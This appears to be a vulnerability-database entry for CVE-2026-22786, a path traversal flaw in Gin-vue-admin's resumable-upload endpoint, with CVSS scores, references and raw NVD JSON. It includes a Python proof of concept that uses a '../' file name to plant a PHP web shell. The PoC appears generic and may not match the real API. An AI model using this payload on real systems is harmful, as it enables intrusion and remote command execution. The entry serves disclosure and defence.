CVE-2026-22786

Description

Gin-vue-admin is a backstage management system based on vue and gin. Gin-vue-admin <= v2.8.7 has a path traversal vulnerability in the breakpoint resume upload functionality. Attacker can upload any files on any directory. In the breakpoint_continue.go file, the MakeFile function accepts a fileName parameter through the /fileUploadAndDownload/breakpointContinueFinish API endpoint and directly concatenates it with the base directory path (./fileDir/) using os.OpenFile() without any validation for directory traversal sequences (e.g., ../). An attacker with file upload privileges could exploit this vulnerability.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:gin-vue-admin_project:gin-vue-admin:*:*:*:*:*:*:*:* - VULNERABLE

Gin-vue-admin <= v2.8.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-22786 Path Traversal PoC for Gin-vue-admin
# Target: /fileUploadAndDownload/breakpointContinueFinish

target_url = "http://target-server/api/fileUploadAndDownload/breakpointContinueFinish"

# Path traversal payload to write file to arbitrary directory
malicious_filename = "../../../var/www/html/shell.php"
payload = {
    "fileName": malicious_filename
}

# Malicious PHP shell content
files = {
    "file": ("test.txt", "<?php system($_GET['cmd']); ?>", "text/plain")
}

try:
    response = requests.post(target_url, data=payload, files=files, timeout=10)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
    
    # Verify file creation
    if response.status_code == 200:
        print(f"[+] File uploaded via path traversal: {malicious_filename}")
        print("[+] Target may be vulnerable to RCE via uploaded webshell")
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22786
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22786
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22786/
[4] VulDB https://vuldb.com/cve/CVE-2026-22786
[5] https://github.com/flipped-aurora/gin-vue-admin/commit/2242f5d6e133e96d1b359ac019bf54fa0e975dd5
[6] https://github.com/flipped-aurora/gin-vue-admin/security/advisories/GHSA-3558-j79f-vvm6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22786", "sourceIdentifier": "[email protected]", "published": "2026-01-12T22:16:08.190", "lastModified": "2026-03-12T19:04:14.820", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gin-vue-admin is a backstage management system based on vue and gin. Gin-vue-admin <= v2.8.7 has a path traversal vulnerability in the breakpoint resume upload functionality. Attacker can upload any files on any directory. In the breakpoint_continue.go file, the MakeFile function accepts a fileName parameter through the /fileUploadAndDownload/breakpointContinueFinish API endpoint and directly concatenates it with the base directory path (./fileDir/) using os.OpenFile() without any validation for directory traversal sequences (e.g., ../). An attacker with file upload privileges could exploit this vulnerability."}, {"lang": "es", "value": "Gin-vue-admin es un sistema de gestión de *backend* basado en Vue y Gin. Gin-vue-admin <= v2.8.7 tiene una vulnerabilidad de salto de ruta en la funcionalidad de carga de reanudación de punto de interrupción. El atacante puede cargar cualquier archivo en cualquier directorio. En el archivo breakpoint_continue.go, la función MakeFile acepta un parámetro fileName a través del *endpoint* de la API /fileUploadAndDownload/breakpointContinueFinish y lo concatena directamente con la ruta del directorio base (./fileDir/) usando os.OpenFile() sin ninguna validación para secuencias de salto de directorio (por ejemplo, ../). Un atacante con privilegios de carga de archivos podría explotar esta vulnerabilidad."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gin-vue-admin_project:gin-vue-admin:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.8.7", "matchCriteriaId": "4F430916-9748-45E9-A918-EB00FE62E385"}]}]}], "references": [{"url": "https://github.com/flipped-aurora/gin-vue-admin/commit/2242f5d6e133e96d1b359ac019bf54fa0e975dd5", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/flipped-aurora/gin-vue-admin/security/advisories/GHSA-3558-j79f-vvm6", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}